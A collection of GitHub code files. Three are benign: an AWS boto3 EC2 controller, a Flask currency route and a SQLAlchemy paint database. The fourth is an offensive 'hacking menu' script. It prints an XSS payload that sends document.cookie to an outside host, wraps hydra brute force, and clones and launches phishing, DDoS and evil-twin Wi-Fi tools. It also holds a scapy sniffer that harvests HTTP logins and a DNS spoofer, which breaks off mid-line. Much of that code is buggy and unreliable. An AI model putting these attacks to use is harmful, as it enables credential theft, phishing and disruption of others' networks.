+{"seq_id":"32015866694","text":"import botocore\r\nimport botocore.exceptions\r\nfrom Logger import Logger\r\nfrom Config import AWS_REGION\r\n\r\n\r\nclass EC2Controller:\r\n # A class for controlling interactions with the boto3 EC2 Resource and Client Interface\r\n\r\n INSTANCES_DISPLAY_FORMAT = ' {0}({1}) \\t {2} - {3} \\t '\r\n DEVICE_DISPLAY_FORMAT = \"\\t\\t'{}'\\t '{}'\"\r\n MSG_INFO_AMI_CREATED = \"AMI created: {}['{}']\"\r\n MSG_INFO_INSTANCE_CREATED = \"Instance created.{}\"\r\n MSG_INFO_INSTANCE_STARTING = \"Starting instance:'{}'.Please wait..\"\r\n MSG_INFO_INSTANCE_STARTED = \"Instance started:'{}'\"\r\n MSG_INFO_INSTANCE_STOPPING = \"Stopping instance:'{}'.Please wait..\"\r\n MSG_INFO_INSTANCE_STOPPED = \"Instance stopped:'{}'\"\r\n MSG_INFO_RUNNING_INSTANCE = \"Running EC2 Instances: {}\"\r\n MSG_INFO_STOPPED_INSTANCE = \"Stopped EC2 Instances: {}\"\r\n MSG_INFO_STOPPED_RUNNING_INSTANCE = \"Available EC2 Instances: {}\"\r\n MSG_WARN_NO_INSTANCE = \"There is no EC2 Instance at this moment..\"\r\n MSG_WARN_NO_RUNNING_INSTANCE = \"There is no running EC2 Instance at this moment..\"\r\n MSG_WARN_NO_STOPPED_INSTANCE = \"There is no stopped EC2 Instance at this moment..\"\r\n MSG_WARN_NO_INSTANCE_FOR_EMI = \"There is no EC2 Instance for AMI creation at this moment..\"\r\n MSG_INFO_VOL_FROM_SNAP_CREATED = \"Volume created: {0}({1}) \\t {2}-{3} \\t \"\r\n STR_AWS_INSTANCE = \"\"\r\n STR_ATTACHED_DEVICE = \"\\t\\t\"\r\n\r\n def __init__(self, ec2res, ec2client):\r\n # EC2Controller Constructor, assigns the ec2 Resource \"ec2res\" and \"ec2client\" Client to this controller\r\n self.ec2_res = ec2res\r\n self.ec2_client = ec2client\r\n\r\n def start_instance(self, instance_id):\r\n # Start instance with id 'instance_id'\r\n try:\r\n instance = self.ec2_res.Instance(instance_id)\r\n instance.start()\r\n Logger.info(self.MSG_INFO_INSTANCE_STARTING.format(instance_id))\r\n # Wait for instance start operation to complete\r\n instance.wait_until_running()\r\n Logger.info(self.MSG_INFO_INSTANCE_STARTED.format(instance_id))\r\n except botocore.exceptions.ClientError as error:\r\n Logger.err(str(error))\r\n\r\n def stop_instance(self, instance_id):\r\n # Stop instance with id 'instance_id'\r\n try:\r\n instance = self.ec2_res.Instance(instance_id)\r\n instance.stop()\r\n Logger.info(self.MSG_INFO_INSTANCE_STOPPING.format(instance_id))\r\n # Wait for instance stop operation to complete\r\n instance.wait_until_stopped()\r\n Logger.info(self.MSG_INFO_INSTANCE_STOPPED.format(instance_id))\r\n except botocore.exceptions.ClientError as error:\r\n Logger.err(str(error))\r\n\r\n def list_instances(self):\r\n # List all EC2 instances\r\n return self.list_all_instances(self.ec2_res.instances.all())\r\n\r\n def list_all_instances(self, instances):\r\n count = 0\r\n running_instances = []\r\n pending_instances = []\r\n shutting_down_instances = []\r\n terminated_instances = []\r\n stopping_instances = []\r\n stopped_instances = []\r\n # Loop through all EC2 instances\r\n for instance in instances:\r\n instance_info = [instance.id, instance.state['Name'], instance.image_id, instance.instance_type,\r\n AWS_REGION, instance.launch_time]\r\n if instance.state['Name'] == \"running\":\r\n running_instances.append(instance_info)\r\n elif instance.state['Name'] == \"pending\":\r\n pending_instances.append(instance_info)\r\n elif instance.state['Name'] == \"shutting-down\":\r\n shutting_down_instances.append(instance_info)\r\n elif instance.state['Name'] == \"terminated\":\r\n terminated_instances.append(instance_info)\r\n elif instance.state['Name'] == \"stopping\":\r\n stopping_instances.append(instance_info)\r\n elif instance.state['Name'] == \"stopped\":\r\n stopped_instances.append(instance_info)\r\n count += 1\r\n if count == 0:\r\n Logger.warn(self.MSG_WARN_NO_INSTANCE)\r\n else:\r\n Logger.header(self.STR_AWS_INSTANCE)\r\n for running_instance in running_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*running_instance))\r\n for pending_instance in pending_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*pending_instance))\r\n for stopping_instance in stopping_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*stopping_instance))\r\n for stopped_instance in stopped_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*stopped_instance))\r\n for shutting_down_instance in shutting_down_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*shutting_down_instance))\r\n for terminated_instance in terminated_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*terminated_instance))\r\n return count\r\n\r\n def list_running_instance(self):\r\n # List all running EC2 instances\r\n count = 0\r\n running_instances = []\r\n all_instances = self.ec2_res.instances.all()\r\n total_instances = self.list_all_instances(all_instances)\r\n if total_instances > 0:\r\n for instance in all_instances:\r\n if instance.state['Name'] == \"running\":\r\n running_instances.append(instance.id)\r\n count += 1\r\n if count == 0:\r\n Logger.warn(self.MSG_WARN_NO_RUNNING_INSTANCE)\r\n else:\r\n Logger.avail_info(self.MSG_INFO_RUNNING_INSTANCE.format(running_instances))\r\n return running_instances\r\n\r\n def list_stopped_instance(self):\r\n # List all stopped EC1 instances\r\n count = 0\r\n stopped_instances = []\r\n all_instances = self.ec2_res.instances.all()\r\n total_instances = self.list_all_instances(all_instances)\r\n if total_instances > 0:\r\n for instance in all_instances:\r\n if instance.state['Name'] == \"stopped\":\r\n stopped_instances.append(instance.id)\r\n count += 1\r\n if count == 0:\r\n Logger.warn(self.MSG_WARN_NO_STOPPED_INSTANCE)\r\n else:\r\n Logger.avail_info(self.MSG_INFO_STOPPED_INSTANCE.format(stopped_instances))\r\n return stopped_instances\r\n\r\n def list_stopped_running_instances(self):\r\n # List all stopped and running EC2 instances\r\n count = 0\r\n available_instances = []\r\n all_instances = self.ec2_res.instances.all()\r\n total_instances = self.list_all_instances(all_instances)\r\n if total_instances > 0:\r\n for instance in all_instances:\r\n if instance.state['Name'] == \"running\" or instance.state['Name'] == \"stopped\":\r\n available_instances.append(instance.id)\r\n count += 1\r\n if count == 0:\r\n Logger.warn(self.MSG_WARN_NO_INSTANCE_FOR_EMI)\r\n else:\r\n Logger.avail_info(self.MSG_INFO_STOPPED_RUNNING_INSTANCE.format(available_instances))\r\n return available_instances\r\n\r\n def instance_attached_block_devices(self, instance_id):\r\n # Any block device mapping entries for the instance\r\n count = 0\r\n instance = self.ec2_res.Instance(instance_id)\r\n attached_block_devices = []\r\n attached_devices_details = []\r\n bdm = instance.block_device_mappings\r\n for device in bdm:\r\n attached_block_devices.append(device['DeviceName'])\r\n ebs = device['Ebs']\r\n device_info = [device['DeviceName'], ebs['VolumeId']]\r\n attached_devices_details.append(device_info)\r\n count += 1\r\n if count > 0:\r\n Logger.header(self.STR_ATTACHED_DEVICE.format(instance_id))\r\n for devices_detail in attached_devices_details:\r\n Logger.sub_info(self.DEVICE_DISPLAY_FORMAT.format(*devices_detail))\r\n return attached_block_devices\r\n\r\n def instance_platform_name(self, instance_id):\r\n # instance platform name\r\n platform = self.ec2_res.Instance(instance_id).platform\r\n return platform\r\n\r\n def instance_state(self, instance_id):\r\n # instance state name\r\n state = self.ec2_res.Instance(instance_id).state['Name']\r\n return state\r\n\r\n def instance_root_device_name(self, instance_id):\r\n # instance root device name\r\n root_device_name = self.ec2_res.Instance(instance_id).root_device_name\r\n return root_device_name\r\n\r\n def create_instance(self, image_id, instance_type):\r\n # create a new EC2 instance with the given AMI Image ID\r\n try:\r\n instance = self.ec2_res.create_instances(ImageId=image_id, MinCount=1, MaxCount=1,\r\n InstanceType=instance_type)\r\n Logger.info(self.MSG_INFO_INSTANCE_CREATED.format(instance))\r\n except botocore.exceptions.ClientError as error:\r\n Logger.err(str(error))\r\n\r\n def create_image(self, instance_id, image_name):\r\n # create a new AMI from the given instance ID\r\n try:\r\n image_id = self.ec2_client.create_image(InstanceId=instance_id, Name=image_name)\r\n Logger.info(self.MSG_INFO_AMI_CREATED.format(image_name, image_id['ImageId']))\r\n except botocore.exceptions.ClientError as error:\r\n Logger.err(str(error))\r\n\r\n def create_volume(self, availability_zone, snapshot_id):\r\n # Create a volume from a snapshot\r\n try:\r\n volume = self.ec2_client.create_volume(AvailabilityZone=availability_zone, SnapshotId=snapshot_id)\r\n Logger.info(\r\n self.MSG_INFO_VOL_FROM_SNAP_CREATED.format(volume['VolumeId'], volume['State'], volume['VolumeType'],\r\n str(volume['Size']) + \"GB\",\r\n volume['AvailabilityZone'],\r\n volume['CreateTime']))\r\n except botocore.exceptions.ClientError as error:\r\n Logger.err(str(error))\r\n","repo_name":"GitPointer/AWS_BOTO3_CLI","sub_path":"AWS_Boto3/EC2.py","file_name":"EC2.py","file_ext":"py","file_size_in_byte":10521,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"}
+{"seq_id":"16250174814","text":"# flake8: noqa\nfrom flask import Blueprint, jsonify\n\nfrom currencyexchange.database.fxrates import FxRate\n\nfxrates = Blueprint('fxrates', __name__)\n\n@fxrates.route('/refresh_fx_rates')\ndef refresh_fx_rates():\n count = FxRate.refresh_from_api()\n if count:\n response = dict(status=\"SUCCESS\", count=count)\n else:\n response = dict(status=\"FAILED\", count=None)\n return jsonify(response)\n","repo_name":"jerryshikanga/currency-exchange","sub_path":"currencyexchange/views/fxrates.py","file_name":"fxrates.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"19525424570","text":"from sqlalchemy import create_engine, Column, Integer, String, Float\r\nfrom sqlalchemy.orm import sessionmaker\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\n\r\nengine = create_engine(\"postgresql+psycopg2://postgres:admin@localhost/postgres\", echo=False)\r\n\r\nSession = sessionmaker(bind=engine)\r\nsession = Session()\r\n\r\nBase = declarative_base()\r\n\r\nclass SQL_Paint(Base):\r\n __tablename__ = \"paint\"\r\n\r\n id = Column(Integer, primary_key=True)\r\n name = Column(String[50])\r\n color = Column(String[50])\r\n type = Column(String[50])\r\n sizes = Column(String[50])\r\n prices = Column(String[50])\r\n area = Column(Float)\r\n\r\nBase.metadata.create_all(engine)\r\n\r\ndef addItemToTable():\r\n paint1 = SQL_Paint(name=\"Dulux\", color=\"White\", type=\"Matt\", sizes=\"2.5/5/10\", prices=\"14/18/22\", area=\"13\")\r\n\r\n session.add(paint1)\r\n\r\n session.commit()\r\n\r\n\r\ndef addItemsManually():\r\n name = input(\"name \")\r\n color = input(\"color \")\r\n type = input(\"paint type \")\r\n sizes = input(\"paint sizes \")\r\n prices = input(\"paint prices \")\r\n area = input(\"area \")\r\n\r\n paint1 = SQL_Paint(name=name, color=color, type=type, sizes=sizes, prices=prices, area=area)\r\n\r\n session.add(paint1)\r\n\r\n session.commit()\r\n\r\ndef readDataOffTable():\r\n paints = session.query(SQL_Paint)\r\n for paint in paints:\r\n print(paint.name)\r\n","repo_name":"thes32/flask_Paint_Can","sub_path":"databaseManager.py","file_name":"databaseManager.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"31275613576","text":"from pip import main\r\nfrom pip._internal import main\r\nfrom scapy import *\r\nimport scapy.all as scapy\r\nfrom scapy.layers import http\r\nimport socket\r\nimport threading\r\nimport subprocess\r\nimport os \r\nimport socket\r\nimport random \r\nimport time\r\nfrom subprocess import Popen\r\nfrom subprocess import call\r\nimport requests, os, sys, tempfile, subprocess, base64, time\r\nimport os\r\nimport signal\r\nimport csv\r\nimport speedtest\r\nimport datetime\r\nimport re\r\nimport sys\r\nimport webbrowser\r\n#https://www.youtube.com/watch?v=5-IRImDXjjc EN EL MINUTO 2:21:59 (spoofer snifeer\r\nlog = \"\"\r\ndef GPS():\r\n print(\"datos que debas conocer:frecuencia de onda\")\r\n frecuencia = input(\"ingrese la frecuencia(HZ)>\") \r\n distancia = float((frecuencia)*299708000)\r\n print(\"distancia:\"+distancia+\"metros\")\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#\r\ndef FMhack():\r\n print(\"1 -->> Install\")\r\n print(\"2 -->> Execute\")\r\n tipu = input(\"1 or 2?:\")\r\n if tipu == \"1\":\r\n os.system(\"git clone https://github.com/ChristopheJacquet/PiFmRds.git\")\r\n os.system(\"mv PiFmRds/src/ *\")\r\n os.system(\"make clean\")\r\n os.system(\"make\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -03 -march+armv7-a -mtune+arm1176jzf-s -mfloat-ab1=hard -mfpu=vfp -ffast-math -DRASPI=2 rds.c\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -03 -march+armv7-a -mtune+arm1176jzf-s -mfloat-ab1=hard -mfpu=vfp -ffast-math -DRASPI=2 waveforms.c\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -03 -march+armv7-a -mtune+arm1176jzf-s -mfloat-ab1=hard -mfpu=vfp -ffast-math -DRASPI=2 pi_fm_rds.c\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -03 -march+armv7-a -mtune+arm1176jzf-s -mfloat-ab1=hard -mfpu=vfp -ffast-math -DRASPI=2 fm_mpx.c\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -03 -march+armv7-a -mtune+arm1176jzf-s -mfloat-ab1=hard -mfpu=vfp -ffast-math -DRASPI=2 control_pipe.c\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -03 -march+armv7-a -mtune+arm1176jzf-s -mfloat-ab1=hard -mfpu=vfp -ffast-math -DRASPI=2 mailbox.c\")\r\n os.system(\"gcc -o pi_fm_rds rds.o waveforms.o mailbox.o pi_fm_rds.o gm_mpx.o control_pipe.o -lm -lsndfile\")\r\n os.system(\"clear\")\r\n print(\"monta el arduino en la imagen /hack-radio-frequencies-hijacking-fm-radio-with-raspberry-pi-wire.w1456.jpg/\")\r\n print(\" mas info en https://null-byte.wonderhowto.com/how-to/hack-radio-frequencies-hijacking-fm-radio-with-raspberry-pi-wire-0177007/\")\r\n if tipu == \"2\":\r\n freq = input(\"Frecuency-->>\")\r\n os.system(\"sudo ./pi_fm_rds -freq \"+freq+\" -audio audio.wav\")\r\ndef vulnerability():\r\n print(\"1 -->> Install\")\r\n print(\"2 -->> Execute\")\r\n x = input(\"1 or 2?:\")\r\n if x == \"1\":\r\n os.system(\"git clone https://github.com/infosecsecurity/Spaghetti\")\r\n os.system(\"mv Spaghetti/ *\")\r\n os.system(\"sudo pip install -r doc/requirements.txt\")\r\n if x == \"2\":\r\n os.system(\"python3 spaghetti.py -h\")\r\ndef XSSattack():\r\n console = \"\"\"\r\n\r\n console.log(document.cookie)\r\n console.log(localStorage)\r\n\r\n \"\"\"\r\n exploit = \"\"\"\r\n var xmlHttp = new XMLHttpRequest();\r\n xmlHttp.open(\"GET\", 'https://XXXXXXXXX.com/register.php?cookie='+document.cookie);\r\n xmlHttp.send(null);\r\n \"\"\"\r\n PHP = \"\"\"\r\n \r\n var test = ‘.. / example.php? cookie_data =’ + escape (document.cookie);\r\n \r\n\r\n \"\"\"\r\n print(\"exploit console:\" +exploit+\"\")\r\n print(\"\")#2\r\n print(\"PHP register:\"+PHP+\"\")\r\n print(\"\")#1\r\n print(\"Console:\"+console+\"\")\r\n print(\"\")#3#\r\n print(\"script in the web:\"+scriptweb+\"\")\r\n tipa = input(\"Do you want to install (Y , N or payloads):\")\r\n if tipa == \"Y\":\r\n os.system(\"git clone https://github.com/securityproject/web-app-pentesting\")\r\n os.system(\"mv web-app-pentesting/ *\")\r\n if tipa == \"N\":\r\n os.system(\"sudo python3 brutefxss.py\")\r\n if tipa == \"payloads\":\r\n tipar = input(\"do you want to install?(Y or N):\")\r\n if tipar == \"Y\": \r\n os.system(\"https://github.com/farinap5/webpwn\")\r\n os.system(\"mv webpwn/ *\")\r\n if tipar == \"N\":\r\n print(\" Example:https://iesjuanramonjimenez.org/?s=Frances\")\r\n web = input(\"Print the website:\")\r\n os.system(\"sudo python3 webpwn.py \"+web+ \"\")\r\ndef VPN():\r\n __author__ = \"nil\"\r\n __copyright__ = \"nil\"\r\n __license__ = \"nil\"\r\n __version__ = \"nil\"\r\n __maintainer__ = \"nil\"\r\n __email__ = \"nil\"\r\n\r\n\r\n if len(sys.argv) != 2:\r\n print('usage: ' + sys.argv[0] + ' [country name | country code]')\r\n exit(1)\r\n country = sys.argv[1]\r\n\r\n if len(country) == 2:\r\n i = 6 # short name for country\r\n elif len(country) > 2:\r\n i = 5 # long name for country\r\n else:\r\n print('Country is too short!')\r\n exit(1)\r\n \r\n try:\r\n vpn_data = requests.get('http://www.vpngate.net/api/iphone/').text.replace('\\r','')\r\n servers = [line.split(',') for line in vpn_data.split('\\n')]\r\n labels = servers[1]\r\n labels[0] = labels[0][1:]\r\n servers = [s for s in servers[2:] if len(s) > 1]\r\n except:\r\n print('Cannot get VPN servers data')\r\n exit(1)\r\n \r\n desired = [s for s in servers if country.lower() in s[i].lower()]\r\n found = len(desired)\r\n print('Found ' + str(found) + ' servers for country ' + country)\r\n if found == 0:\r\n exit(1)\r\n \r\n supported = [s for s in desired if len(s[-1]) > 0]\r\n print(str(len(supported)) + ' of these servers support OpenVPN')\r\n # We pick the best servers by score\r\n winner = sorted(supported, key=lambda s: float(s[2].replace(',','.')), reverse=True)[0]\r\n print (\"\\n== Best server ==\")\r\n pairs = zip(labels, winner)[:-1]\r\n for (l, d) in pairs[:4]:\r\n print(l + ': ' + d)\r\n\r\n print(pairs[4][0] + ': ' + str(float(pairs[4][1]) / 10**6) + ' MBps')\r\n print(\"Country: \" + pairs[5][1])\r\n \r\n print (\"\\nLaunching VPN...\")\r\n _, path = tempfile.mkstemp()\r\n\r\n f = open(path, 'w')\r\n f.write(base64.b64decode(winner[-1]))\r\n f.write('\\nscript-security 2\\nup /etc/openvpn/update-resolv-conf\\ndown /etc/openvpn/update-resolv-conf')\r\n f.close()\r\n\r\n x = subprocess.Popen(['sudo', 'openvpn', '--config', path])\r\n\r\n try:\r\n while True:\r\n time.sleep(600)\r\n # termination with Ctrl+C\r\n except:\r\n try:\r\n x.kill()\r\n except:\r\n pass\r\n while x.poll() != 0:\r\n time.sleep(1)\r\n print ('\\nVPN terminated')\r\n\r\ndef bruteforce():\r\n print(\"sudo hydra -l [user] -P [location wordlist] [IP] [method]\")\r\n print(\"methods:telnet,http,https,ssh,FTP,SMTP[25],IMAP\")\r\n print(\"wordlist:9e89fe_eada3f79027240d38184dd68f8efa476.txt\")\r\n print(\"type without sudo hydra\")\r\n print(\"Example: -l user -P wordlist:9e89fe_eada3f79027240d38184dd68f8efa476.txt 255.255.255.0 http\")\r\n command = input (\">>>\")\r\n os.system(\"sudo hydra \"+command+ \"\")\r\n\r\ndef localflood():\r\n print(\"asegurese de que la carpeta contenga los archivos html para el texto\")\r\n print(\"seguido de esto utilice el comando [CD] para entrar en la carpeta\")\r\n print(\"por ultimo inserte el comando [python -m http.server --bind localhost --cgi [puerto normalmente 8080 o 8081]\")\r\n\r\n\r\ndef fastMeterpreter():\r\n print(\"1--> Download\")\r\n print(\"2--> Execute\")\r\n down = input(\"1 or 2:\")\r\n if down == \"1\":\r\n os.system(\"sudo apt install metasploit-framwerk gnome-terminal python3 python3-pip nc\")\r\n os.system(\"mv fastMeterpreter2/ * \")\r\n os.system(\"pip install -r requirements.txt\")\r\n if down == \"2\":\r\n os.system(\"sudo python3 fastMeterpreter2.py\")\r\n\r\ndef wifispeed():\r\n print(\"1--> Monitoreo grafico\")\r\n print(\"2--> Monitoreo en consola\")\r\n monitoreo = input(\"1 or 2:\")\r\n if monitoreo == \"1\":\r\n times = []\r\n download = []\r\n upload = []\r\n with open('test.csv', 'r') as csvfile:\r\n plots = csv.reader(csvfile, delimiter=',')\r\n next(csvfile)\r\n for row in plots:\r\n times.append(str(row[0]))\r\n download.append(float(row[1]))\r\n upload.append(float(row[2]))\r\n print(times, \"\\n\", download, \"\\n\", upload)\r\n plt.figure('speedtest', [30, 30])\r\n plt.plot(times, download, label='download', color='r')\r\n plt.plot(times, upload, label='upload', color='b')\r\n plt.xlabel('time')\r\n plt.ylabel('speed in Mb/s')\r\n plt.title(\"internet speed\")\r\n plt.legend()\r\n plt.savefig('test_graph.jpg', bbox_inches='tight')\r\n if monitoreo == \"2\":\r\n s = speedtest.Speedtest()\r\n while True:\r\n time = datetime.datetime.now().strftime(\"%H:%M:%S\")\r\n downspeed = round((round(s.download()) / 1048576), 2)\r\n upspeed = round((round(s.upload()) / 1048576), 2)\r\n print(f\"time: {time}, downspeed: {downspeed} Mb/s, upspeed: {upspeed} Mb/s\")\r\n\r\ndef passwordspeed():\r\n Hashcat = input(\"Do you have Hashcat installed?(Y or N):\")\r\n if Hashcat == \"Y\":\r\n os.system(\"sudo apt-get install hashcat\")\r\n if hashcat == \"N\":\r\n os.system(\"sudo hashcat -b\")\r\ndef goodkiller():\r\n print(\"1 -->>> download \")\r\n print(\"2 -->> Execute\")\r\n you = input(\"1 or 2:\")\r\n if you == \"1\":\r\n os.system(\"https://github.com/FDX100/GOD-KILLER\")\r\n os.system(\"mv GOD-KILLER/ *\")\r\n os.system(\"sudo python3 install.py\")\r\n if you == \"2\":\r\n os.system(\"GOD-KILLER\")\r\ndef phoneinfoga():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n phoneinfoga = input(\"1 or 2:\")\r\n if phoneinfoga == \"1\":\r\n os.system(\"git clone https://github.com/sundowndev/PhoneInfoga\")\r\n os.system(\"mv PhoneInfoga/ *\")\r\n os.system(\"sudo python3 -m pip install -r requirements.txt --user\")\r\n os.system(\"sudo wget https://github.com/mozilla/geckodriver/releases/download/v0.24.0/geckodriver-v0.24.0-linux64.tar.gz\")\r\n os.system(\"sudo tar xvfz geckodriver-v0.24.0-linux64.tar.gz\")\r\n os.system(\"sudo chmod +x geckodriver\")\r\n os.system(\"sudo export PATH=$PATH:/ruta-extraida/\")\r\n os.system(\"docker pull sundowndev/phoneinfoga:latest\")\r\n os.system(\"docker run --rm -it sundowndev/phoneinfoga --help\")\r\n if phoneinfoga == \"2\":\r\n print(\"EJ:(+51) 927742190\")\r\n phone = input(\"tlfn phone with the (+)>>>\")\r\n os.system(\"python3 phoneinfoga.py -n \"+phone+\"\")\r\ndef BTCanalizer():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n BTC = input(\"1 or 2:\")\r\n if BTC == \"1\":\r\n os.system(\"git clone https://github.com/s4vitar/btcAnalyzer\")\r\n os.system(\"mv btcAnalyzer/ *\")\r\n os.system(\"sudo apt-get install html2text bc -y\")\r\n if BTC == \"2\":\r\n print(\"-n transacciones totales\")\r\n print(\"-i identificador de la transaccion\")\r\n print(\"-a especificar la adress\")\r\n print(\"EJ: -e adress -a XXXXXXXXXXXXXXXXXX\")\r\n what = input(\"command:\")\r\n os.system(\"sudo ./btcAnalyzer\" +what+ \"\")\r\n\r\ndef wifiCrack():\r\n print(\" 1 -->> Download\")\r\n print(\" 2 -->> Execute\")\r\n input = input(\"1,2>>>\")\r\n if Wifi == \"1\":\r\n os.system(\"git clone https://github.com/s4vitar/wifiCrack\")\r\n if Wifi == \"2\":\r\n os.system(\"sudo ./s4iPwnWifi.sh\")\r\n\r\ndef TPLINK():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n tplin = input(\"1 or 2:\")\r\n if tplin == \"1\": \r\n print(\"Wait a second...\")\r\n time.sleep(4)\r\n os.system(\"git clone https://github.com/vk496/linset\")\r\n os.system(\"mv Linset/* .\")\r\n os.system(\"chmod +x linset\")\r\n if tplin == \"2\":\r\n os.system(\"./linset\")\r\ndef Ddoswifi():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n wifi = input(\"1 or 2:\")\r\n if wifi == \"1\":\r\n os.system(\"git clone https://github.com/palahsu/DDoS-Ripper\")\r\n os.system(\"mv DDoS-Ripper/ *\")\r\n if wifi == \"2\": \r\n print(\"_________________________________\")\r\n print(\"select de IP and the turbo(100-x/kB of your network\")\r\n print(\"_________________________________\")\r\n IP = input(\"IP victim:\")\r\n Port = input(\"PORT:\")\r\n turbo = input(\"turbo:\")\r\n os.system(\"sudo python3 DRipper.py -s \"+IP+\" -p \"+Port+\" -t \" +turbo+ \"\")\r\n\r\ndef Ufonet():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n input = input(\"1 or 2:\")\r\n if Ufo == \"1\":\r\n os.system(\"https://github.com/epsylon/ufonet\")\r\n os.system(\"mv ufonet/ *\")\r\n os.system(\"sudo python3 setup.py install\")\r\n os.system(\"sudo apt-get install python3-pycurl python3-geoip python3-whois python3-crypto python3-requests python3-scapy libgeoip1 libgeoip-dev\")\r\n if Ufo == \"2\":\r\n os.system(\"sudo python3 ./ufonet --gui \")\r\n time.sleep(5)\r\n webbrowser.open_new_tab(\"http://127.0.0.1:9999\")\r\ndef Phishing():\r\n customweb = input(\"Do you want to take a custom web?(Y or N):\")\r\n if customweb == \"Y\":\r\n URL = input(\"Enter the custom URL:\")\r\n os.system(\"wget \"+URL+\"\")\r\n print(\"downloading eviltrust...\")\r\n time.sleep(2)\r\n os.system(\"git clone https://github.com/s4vitar/evilTrust\")\r\n os.system(\"mv evilTrust/ *\")\r\n os.system(\"sudo bash evilTrust.sh\")\r\n if customweb == \"N\":\r\n os.system(\"git clone https://github.com/htr-tech/zphisher\")\r\n os.system(\"mv zphisher/ *\")\r\n os.system(\"sudo bash zphisher.sh\")\r\n\r\ndef checkSPY():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n input = input(\"1 or 2:\")\r\n if SPY == \"1\":\r\n os.system(\"https://github.com/mvt-project/mvt\")\r\n if SPY == \"2\":\r\n Print(\"Recuerde conectar el telefono VIA USB\")\r\n print(\"Tambien Recuerde leer de arriba hacia abajo\")\r\n print(\"Android or IOS?\")\r\n sistem = input(\">>>\")\r\n if sistem == \"Android\":\r\n os.system(\"mvt-android check-adb\")\r\n os.system(\"mvt-android check-backup\")\r\n os.system(\"mvt-android check-bugreport\")\r\n os.system(\"mvt-android check-iocs\")\r\n print(\"Do you want to install The APK of MVT?\")\r\n nstall = input(\"Y or N?:\")\r\n if ntall == \"Y\":\r\n os.system(\"mvt-android download-apks\")\r\n if ntall == \"N\":\r\n print(\"press ctrl+C to exit\")\r\n time.sleep(1000000000000)\r\n if sistem == \"IOS\":\r\n os.system(\"mvt-ios check-backup\")\r\n os.system(\"mvt-ios check-fs\")\r\n os.system(\"mvt-ios check-iocs\")\r\n print(\"Do you want to install the Public Indicator?\")\r\n niostall = input(\"Y or N:\")\r\n if niostall == \"Y\":\r\n os.system(\"mvt-ios download-iocs\")\r\n print(\"Ctrl+C to exit\")\r\n time.sleep(100000000000000)\r\n if niostall == \"N\":\r\n print(\"Ctrl+C to exit\")\r\n time.sleep(100000000000000)\r\ndef sniffer():\r\n def sniff(interface):\r\n scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)\r\n\r\n def get_url(packet):\r\n return packet[http.HTTPRequest].Host + packet[http.HTTPRequesst].Path\r\n\r\n def get_login_info(packet):\r\n if packet.haslayer(scapy.Raw):\r\n load = packet[scapy.Raw].load\r\n keywords = [\"username\" , \"user\" , \"login\" , \"password\" , \"pass\"]\r\n for keyword in keywords:\r\n if keyword in load:\r\n return load \r\n def process_sniffed_packet(packet):\r\n if packet.haslayer(http.HTTPRequest):\r\n url = packet[http.HTTPREQUEST].Host + packet[http.HTTPREQUEST].path\r\n print(url)\r\n print(\"[+] HTTP Request >>>\" + url)\r\n\r\n login_info = get_login_info(packet)\r\n if login_info:\r\n print(\"\\n\\n[+] Usuario y Contraseña Posibles >\"+ login_Info + \"\\n\\n\")\r\n\r\n sniff(\"eth0\")\r\ndef DNSspoofer():\r\n dev = \"enp3s0f1\"\r\n filter = \"udp port 53\"\r\n file = None\r\n dns_map = {}\r\n\r\n def handle_packet(packet):\r\n ip = packet.getlayer(scapy.IP)\r\n udp = packet.getlayer(scapy.UDP)\r\n dns = packet.getlayer(scapy.DNS)\r\n\r\n # standard (a record) dns query\r\n if dns.qr == 0 and dns.opcode == 0:\r\n queried_host = dns.qd.qname[:-1].decode()\r\n resolved_ip = None\r\n\r\n if dns_map.get(queried_host):\r\n resolved_ip = dns_map.get(queried_host)\r\n elif dns_map.get('*'):\r\n resolved_ip = dns_map.get('*')\r\n\r\n if resolved_ip:\r\n dns_answer = scapy.DNSRR(rrname=queried_host + \".\",\r\n ttl=330,\r\n type=\"A\",\r\n rclass=\"IN\",\r\n rdata=resolved_ip)\r\n\r\n dns_reply = scapy.IP(src=ip.dst, dst=ip.src) / \\\r\n scapy.UDP(sport=udp.dport,\r\n dport=udp.sport) / \\\r\n scapy.DNS(\r\n id = dns.id,\r\n qr = 1,\r\n aa = 0,\r\n rcode = 0,\r\n qd = dns.qd,\r\n an = dns_answer\r\n )\r\n\r\n print(\"Send %s has %s to %s\" % (queried_host,\r\n resolved_ip,\r\n ip.src))\r\n scapy.send(dns_reply, iface=dev)\r\n\r\n\r\n def usage():\r\n print(sys.argv[0] + \" -f -i \")\r\n sys.exit(1)\r\n\r\n\r\n def parse_host_file(file):\r\n for line in open(file):\r\n line = line.rstrip('\\n')\r\n\r\n if line:\r\n (ip, host) = line.split()\r\n dns_map[host] = ip\r\n\r\n try:\r\n cmd_opts = \"f:i:\"\r\n opts, args = getopt.getopt(sys.argv[1:], 